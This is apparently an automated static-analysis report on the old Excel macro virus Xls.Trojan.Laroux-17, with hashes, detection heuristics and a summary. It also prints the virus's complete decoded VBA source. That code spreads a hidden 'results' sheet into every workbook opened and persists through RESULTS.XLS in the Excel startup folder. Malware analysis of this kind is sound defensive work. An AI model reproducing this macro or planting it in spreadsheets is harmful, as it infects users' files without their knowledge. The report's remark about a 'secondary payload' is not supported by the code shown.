Xls.Trojan.Laroux-17 — Office (OLE) malware analysis

Static analysis result for SHA-256 4877fcf323dc2596…

MALICIOUS

Office (OLE)

Size: 48.0 KB
Created: 1980-01-04 00:30:07
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: e2d66811994a02315beed788fe7d831d
SHA-1: e28b881281c3b8170e6dc990cf4569a73ac9b324
SHA-256: 4877fcf323dc2596e32ed5d39e7a7eb03711535565c925676ffc65acc6f34905
Risk Score: 240

Malware Insights

Xls.Trojan.Laroux-17 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The file triggers critical heuristics identifying it as an Excel 5 macro virus, specifically Xls.Trojan.Laroux-17. The auto_open macro runs when the workbook is opened and registers the body routine as the sheet-activation handler. That routine copies the "results" module sheet and saves it as 'RESULTS.XLS' in the Excel startup path, which is a common persistence technique. This suggests the file is a malicious attachment designed to deliver a secondary payload.

Heuristics 4

  • ClamAV: Xls.Trojan.Laroux-17 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Laroux-17
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster (critical, OLE_XLS5_LAROUX_MACRO_VIRUS)
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro (high, OLE_VBA_AUTO)
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2067 bytes
SHA-256: b3f853eab4ecc0183d42bb8c26a0dc0858edda555c2e679747ae792cdbf58823
Detection: ClamAV: Xls.Trojan.Laroux-17
Obfuscation or payload: unlikely

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "results"

Option Compare Text

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Rem ??!!???1
    Application.OnSheetActivate = "body"
End Sub

Sub body()
Attribute body.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim awb As Workbook
    Set awb = ActiveWorkbook
    nameofworkbook$ = awb.Name
    currentdirectory$ = CurDir()
    pathofworkbook$ = awb.Path
    startpath$ = Application.StartupPath
    If Dir(startpath$ & "\" & "RESULTS.XLS") = "RESULTS.XLS" And awb.Modules.Count < 1 Then
        Application.ScreenUpdating = False
        sheetname$ = Workbooks(nameofworkbook$).Sheets(1).Name
        If sheetname$ <> "results" Then
            Workbooks("RESULTS.XLS").Sheets("results").Copy before:=Workbooks(nameofworkbook$).Sheets(1)
            Workbooks(nameofworkbook$).Sheets("results").Visible = False
        End If
        Application.OnSheetActivate = ""
        Application.ScreenUpdating = True
        Application.OnSheetActivate = "RESULTS.XLS!body"
    ElseIf Dir(startpath$ & "\" & "RESULTS.XLS") <> "RESULTS.XLS" And awb.Modules.Count > 0 Then
        Application.ScreenUpdating = False
        Sheets("results").Visible = True
        Sheets("results").Select
        Sheets("results").Copy
        Set awb = ActiveWorkbook
        awb.Title = ""
        awb.Subject = ""
        awb.Author = ""
        awb.Keywords = ""
        awb.Comments = ""
        newname$ = awb.Name
        ChDir Application.StartupPath
        ActiveWindow.Visible = False
        Workbooks(newname$).SaveAs Filename:=Application.StartupPath & "/" & "RESULTS.XLS", FileFormat:=xlNormal _
            , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
            False, CreateBackup:=False
        ChDir currentdirectory$
        Workbooks(nameofworkbook$).Sheets("results").Visible = False
        Application.OnSheetActivate = ""
        Application.ScreenUpdating = True
        Application.OnSheetActivate = "RESULTS.XLS!body"
    End If
End Sub